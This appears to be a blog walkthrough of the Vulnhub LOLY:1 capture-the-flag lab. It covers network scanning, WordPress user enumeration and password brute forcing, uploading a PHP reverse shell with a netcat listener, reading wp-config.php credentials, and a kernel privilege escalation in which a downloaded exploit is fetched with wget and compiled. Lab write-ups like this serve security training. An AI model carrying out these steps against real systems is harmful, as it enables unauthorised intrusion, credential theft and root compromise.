Hello Folks, in this Article, we are going
to solve a Capture the Flag (CTF) challenge of LOLY:1 from Vulnhub and the URL
for this CTF is https://vulnhub.com/entry/loly-1,538/.
This CTF is posted by SunSCR Team and aimed for Beginners, so let’s get
started…
Table of Contents
Reconnaissance
·
Netdiscover to find the
machines on our Network
·
Nmap to detect open ports
Enumeration
·
Dirb for Directory Listing and
discovering WordPress site
·
Running wpscan to find
vulnerabilities
·
Running wpscan to brute force
password
Exploitation
·
Uploading a php web shell
·
Running the netcat listener
·
Exploring the wp-config.php
file
Privilege
Escalation
·
Searching Ubuntu related
exploits
·
Exploiting Ubuntu
Reconnaissance
We have to setup our LAB first using a Bridge Network
either in VMWare or Virtual Box (As this LAB support both). We first have to
discover the IP Address of the vulnerable machine using netdiscover by using the following command;
netdiscover -r 192.168.0.1/24
The IP Address discovered by above mentioned command
is 192.168.0.180.
We discovered the IP Address of our vulnerable machine
and now this is the time to run and scan using nmap command;
nmap -A 192.168.0.180
The screenshot below shows that port 80 is open and running nginx server, which we will explore and
enumerate further.
Enumeration
We will browse the site now to see how the interface
feels and what is available there
As we can see the nginx server is running and site is
hosted, now we will run the dirb
command to find the existing and/or hidden Web objects.
dirb http://192.168.0.180
From the screenshot below we can see that this is a WordPress site and we can also see the wp-admin path
As we know the WordPress and its related plugins are
prone to vulnerability so we will focus on this part to find out any low
hanging fruits.
Upon browsing the site, we observed that the page is
not responding as it supposed to respond, possibly because of domain name
mapping,
Hence, we need to add the entry in
/etc/hosts file as per below
screenshot. This entry will not only browse the page in an efficient way but
will help us as well when we run wpscan
in next screen.
Now, it’s time to run the wpscan to find more vulnerabilities in this WordPress site by using
the following command
wpscan --url http://loly.lc/wordpress --enumerate
u
To find out the login names of users on WordPress
website, we will use the argument --enumerate u at the end of
the command.
After running the wpscan
we found the username which is loly,
as per screenshot below
Now, the next stage is to brute force the username loly with our Kali Linux rockyou.txt file to find the password
by using the following wpscan
command
wpscan --url http://loly.lc/wordpress -U loly -P
/usr/share/wordlists/rockyou.txt
Here: -U can be used for file and single user, both
Eureka!!! We found the password for loly as per below
screenshot
Exploitation
Here comes the exciting part, EXPLOITATION!!! It’s
time to upload the php reverse shell by logging into wordpress site by using
the loly/fernando credentials which we discovered earlier.
Now, access the php
reverse shell payload by browsing the site as per below screenshot but
before that, we have to open a netcat
listener as well for reverse connection which is viewable in next screenshot.
As mentioned above, we need to create a netcat
listener first by using the below command to get the shell
nc -lvp 1234
Now, further exploring the directory structure of our victim machine, we found the wp-config.php file which will help us a lot in solving rest of this CTF. By the way, wp-config.php file is one of the core WordPress files which contains the information about database, name, host (typically local host), username and password.
As you can see that we managed to see the password lolyisabeautifulgirl by viewing the wp-config.php file.
cat /etc/passwd
By running the above command yields the username,
which is our favorite, loly
Privilege Escalation
Here comes the trickier part, PRIVILEGE ESCALATION. First,
we will login by usename loly and
the password we discovered earlier lolyisabeautifulgirl
and run the following command afterwards;
lsb_release -a
The lsb_release command displays LSB (Linux Standard
Base) information about specific Linux distribution, including
version number, release codename, and distributor ID.
Next, we will run the uname command to know about the Linux kernel version and some other information so we should have enough evidence about the system for Privilege Escalation.
uname –a
As we know that Ubuntu
4.4.0 is the Linux Image version being used from the screenshot above, our
next step is to find the exploit related to this version by using the command
below
seachsploit ubuntu 4.4.0
The screenshot below shows the exploits available for
this particular Linux version and our command used to copy the exploit under
root directory;
We will run the python server to host our exploit copied earlier by using the command below
python -m SimpleHTTPServer
Now, switch back to our victim machine and run the
following command from tmp folder to
save the exploit hosted on our Kali machine
wget http://192.168.0.147:8000/45010.c
Run the following command to compile the exploit we
copied earlier
gcc 45010.c -o shell
We will use the chmod
command to make the file readable, writable and executable
chmod 777 shell
The id
command below revealed the real and effective user and group IDs and we can see
that we are running the system as a root as per below screenshot
Now cd to root folder and see if there is any root.txt available, which is correct in
our case. By using the command cat
root.txt we can see our final flag as per below screenshot
0 comments:
Post a Comment